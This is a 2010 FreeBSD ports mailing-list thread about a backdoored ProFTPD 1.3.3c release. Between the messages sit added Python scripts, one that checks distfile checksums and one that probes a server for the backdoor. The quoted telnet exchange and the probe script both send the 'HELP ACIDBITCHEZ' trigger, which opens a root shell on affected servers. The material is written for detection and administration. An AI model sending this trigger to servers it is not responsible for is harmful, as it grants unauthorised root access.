ftp/proftpd 1.3.3c with a version which contained a backdoor.

2010-12-02 Thread Ivan Klymenko
Hello, people!
What do you think, is it worth paying attention to these events:
http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org

and what, in this case, needs to be done with the port ftp/proftpd itself?

Thanks!
___
freebsd-ports@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-ports
To unsubscribe, send any mail to freebsd-ports-unsubscr...@freebsd.org


Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.

2010-12-02 Thread Ivan Klymenko
On Thu, 2 Dec 2010 23:22:06 +0200, Ivan Klymenko fi...@ukr.net wrote:

 Hello, people!
 What do you think, is it worth paying attention to these events:
 http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org
 
 and what, in this case, needs to be done with the port ftp/proftpd
 itself?
 
 Thanks!

You can check whether your server is vulnerable by using the following
command sequence:

$ telnet 1.2.3.4 21
   Trying 1.2.3.4...
   Connected to 1.2.3.4
   Escape character is '^]'.
   220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [1.2.3.4]

   HELP ACIDBITCHEZ
 
   id ;
 
   uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
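As an added example (my own code, not part of the thread and not ProFTPD project code): the check above scripted in Python, with the socket I/O separated from the response analysis so the analysis can be exercised against canned transcripts. The banner and the uid line are the ones quoted above; the "clean" server replies are constructed samples of what an unmodified server answers to unknown commands. Two caveats worth keeping in mind: the version banner alone proves nothing, since clean and backdoored builds both announce 1.3.3c, and on a backdoored server the trigger really does execute a root shell, so only point the live probe at hosts you are responsible for.

```python
"""Added example: script the check from the thread.  A backdoored ProFTPD
1.3.3c turns the control connection into a shell after `HELP ACIDBITCHEZ`,
so a following `id` answers `uid=0(root)` instead of an FTP reply code.
The socket I/O is separated from the response analysis so the analysis
can be exercised offline against canned transcripts.
"""
import re
import socket

TRIGGER = b"HELP ACIDBITCHEZ\r\n"   # the backdoor trigger quoted in the thread
FOLLOWUP = b"id ;\r\n"              # shell prints a uid line; FTP rejects it
FTP_REPLY = re.compile(rb"^\d{3}[ -]")              # "502 ...", "214-..." etc.
ID_OUTPUT = re.compile(rb"\buid=(\d+)\(([^)]+)\)")  # first field of id(1) output


def parse_banner(banner):
    """Version advertised in the 220 greeting, or None.  Informational only:
    clean and backdoored builds of 1.3.3c announce the same string."""
    m = re.search(rb"ProFTPD (\S+) Server", banner)
    return m.group(1).decode() if m else None


def classify(reply):
    """Decide what answered the trigger plus follow-up command."""
    m = ID_OUTPUT.search(reply)
    if m:
        return "backdoored: shell answered as uid=%s(%s)" % (
            m.group(1).decode(), m.group(2).decode())
    if FTP_REPLY.match(reply.lstrip()):
        return "clean: server answered with an FTP reply code"
    return "unknown: no recognisable reply"


def recv_available(conn, bufsize=4096):
    """Drain what the peer sends until it goes quiet (timeout) or closes."""
    data = b""
    while True:
        try:
            chunk = conn.recv(bufsize)
        except socket.timeout:
            break
        if not chunk:
            break
        data += chunk
    return data


def run_probe(conn):
    """Drive the exchange over anything with recv()/sendall().
    Returns (advertised_version, verdict)."""
    banner = recv_available(conn)
    conn.sendall(TRIGGER)
    conn.sendall(FOLLOWUP)
    return parse_banner(banner), classify(recv_available(conn))


def probe(host, port=21, timeout=5.0):
    """Probe a live server.  On a backdoored build the trigger executes a
    root shell, so only run this against hosts you are responsible for."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        return run_probe(s)


class ScriptedConn:
    """Constructed stand-in for a socket that replays canned server output:
    the banner first, then `reply` once the follow-up command has been sent."""

    def __init__(self, banner, reply):
        self._pending = [banner]
        self._reply = reply
        self.sent = []

    def recv(self, bufsize):
        return self._pending.pop(0) if self._pending else b""

    def sendall(self, data):
        self.sent.append(data)
        if data == FOLLOWUP:
            self._pending.append(self._reply)


# Banner and uid line as quoted in the thread; the clean reply is a
# constructed sample of what an unmodified server says to unknown commands.
BANNER = b"220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [1.2.3.4]\r\n"
SHELL_REPLY = b"uid=0(root) gid=0(root) groups=0(root),65534(nogroup)\n"
CLEAN_REPLY = b"502 Unknown command 'ACIDBITCHEZ'.\r\n500 ID not understood\r\n"

if __name__ == "__main__":
    for label, reply in (("backdoored", SHELL_REPLY), ("clean", CLEAN_REPLY)):
        print(label, "->", run_probe(ScriptedConn(BANNER, reply)))
```

`probe("1.2.3.4")` runs the same exchange against a real host; the verdict is based on whether a uid line or an FTP reply code came back, not on the banner.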


Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.

2010-12-02 Thread Chuck Swiger
On Dec 2, 2010, at 1:22 PM, Ivan Klymenko wrote:
 What do you think, is it worth paying attention to these events:
 http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org
 
 and what, in this case, needs to be done with the port ftp/proftpd itself?

Presumably/hopefully, the proftpd tarball which contained the backdoor would 
fail to match the distinfo for the port:

SHA256 (proftpd-1.3.3c.tar.bz2) = ea7f02e21f81e6ce79ebde8bbbd334bd269a039ac9137196a35309f791b24db1
SIZE (proftpd-1.3.3c.tar.bz2) = 4166609

Checking, the tarball you now fetch is the one which matches their md5 and 
GnuPG signing from the link above...

Regards,
-- 
-Chuck



Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.

2010-12-02 Thread Rob Farmer
On Thu, Dec 2, 2010 at 14:00, Chuck Swiger cswi...@mac.com wrote:
 Presumably/hopefully, the proftpd tarball which contained the backdoor would 
 fail to match the distinfo for the port:

 SHA256 (proftpd-1.3.3c.tar.bz2) = ea7f02e21f81e6ce79ebde8bbbd334bd269a039ac9137196a35309f791b24db1
 SIZE (proftpd-1.3.3c.tar.bz2) = 4166609

 Checking, the tarball you now fetch is the one which matches their md5 and 
 GnuPG signing from the link above...

For several hours on Wednesday the distinfo was updated to the
compromised version (it has been reverted), so anyone who updated this
port recently should check their system.

-- 
Rob Farmer
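An added example (my own code, not from the ports tree) covering both Chuck's distinfo check and Rob's point that the distinfo itself was briefly changed: it parses distinfo lines, verifies a fetched distfile's SHA256 and SIZE against them, and diffs two distinfo revisions to flag entries whose checksum moved while the filename stayed the same, which is the pattern a maintainer should stop and look at before committing. The known-good entry is the one quoted in the thread; the demo distfile and its tampered copy are constructed.

```python
"""Added example: verify a distfile against distinfo, and flag distinfo
revisions that change a checksum without changing the filename."""
import hashlib
import os
import re
import tempfile

# Known-good entry for proftpd-1.3.3c.tar.bz2, as quoted in the thread.
KNOWN_GOOD_DISTINFO = """\
SHA256 (proftpd-1.3.3c.tar.bz2) = ea7f02e21f81e6ce79ebde8bbbd334bd269a039ac9137196a35309f791b24db1
SIZE (proftpd-1.3.3c.tar.bz2) = 4166609
"""

LINE = re.compile(r"^(SHA256|SIZE) \((.+?)\) = (\S+)$")


def parse_distinfo(text):
    """Return {filename: {"SHA256": hexdigest, "SIZE": bytes}}."""
    entries = {}
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        kind, name, value = m.groups()
        entry = entries.setdefault(name, {})
        entry[kind] = int(value) if kind == "SIZE" else value.lower()
    return entries


def sha256_file(path):
    """Streamed SHA256 so large tarballs are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_distfile(path, distinfo_text):
    """Check one fetched distfile against distinfo.  Returns (ok, problems)."""
    name = os.path.basename(path)
    entries = parse_distinfo(distinfo_text)
    if name not in entries:
        return False, ["%s: no distinfo entry" % name]
    want, problems = entries[name], []
    size = os.path.getsize(path)
    if "SIZE" in want and size != want["SIZE"]:
        problems.append("size %d != %d" % (size, want["SIZE"]))
    if "SHA256" in want:
        got = sha256_file(path)
        if got != want["SHA256"]:
            problems.append("sha256 %s != %s" % (got, want["SHA256"]))
    else:
        problems.append("no SHA256 line")
    return not problems, problems


def distinfo_changes(old_text, new_text):
    """Files whose recorded hash or size differs between two distinfo
    revisions: {filename: (old_entry, new_entry)}.  A checksum that moves
    while the filename (and so the upstream version) stays the same is the
    case to question before committing."""
    old, new = parse_distinfo(old_text), parse_distinfo(new_text)
    return {name: (old.get(name), new.get(name))
            for name in sorted(set(old) | set(new))
            if old.get(name) != new.get(name)}


def demo():
    """Constructed scenario: a stand-in distfile with a matching distinfo,
    then the same filename re-rolled with different contents."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "example-1.0.tar.bz2")
        with open(path, "wb") as f:
            f.write(b"not a real tarball\n" * 100)
        good = "SHA256 (example-1.0.tar.bz2) = %s\nSIZE (example-1.0.tar.bz2) = %d\n" % (
            sha256_file(path), os.path.getsize(path))
        ok_before = verify_distfile(path, good)[0]
        with open(path, "ab") as f:
            f.write(b"extra bytes\n")  # the "re-rolled" tarball
        ok_after, problems = verify_distfile(path, good)
        return ok_before, ok_after, problems


if __name__ == "__main__":
    print(demo())
```

`verify_distfile("/usr/ports/distfiles/proftpd-1.3.3c.tar.bz2", KNOWN_GOOD_DISTINFO)` is the check Chuck describes; `distinfo_changes(old, new)` over the two revisions of a port's distinfo is the one Rob's note calls for.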


Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.

2010-12-02 Thread Chuck Swiger
On Dec 2, 2010, at 2:55 PM, Rob Farmer wrote:
 Checking, the tarball you now fetch is the one which matches their md5 and 
 GnuPG signing from the link above...
 
 For several hours on Wednesday the distinfo was updated to the
 compromised version (it has been reverted), so anyone who updated this
 port recently should check their system.

I see-- that's useful information to be aware of.  Hopefully port maintainers 
practice a bit more wariness about distfiles changing unexpectedly; while it's 
common enough that people re-roll tarballs for whatever reason, it seems like 
there have been more incidents of reference sites getting owned...

Regards,
-- 
-Chuck



Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.

2010-12-02 Thread Ade Lovett

On Dec 02, 2010, at 17:56 , Chuck Swiger wrote:
 On Dec 2, 2010, at 2:55 PM, Rob Farmer wrote:
 
 For several hours on Wednesday the distinfo was updated to the
 compromised version (it has been reverted), so anyone who updated this
 port recently should check their system.
 
 I see-- that's useful information to be aware of.  Hopefully port maintainers 
 practice a bit more wariness about distfiles changing unexpectedly; while 
 it's common enough that people re-roll tarballs for whatever reason, it seems 
 like there have been more incidents of reference sites getting owned...

If y'all are _absolutely_ certain that the current distfile is correct and not 
compromised, then I would _strongly_ recommend that you bump PORTREVISION to 
make it absolutely obvious, so that folks see this.

-aDe
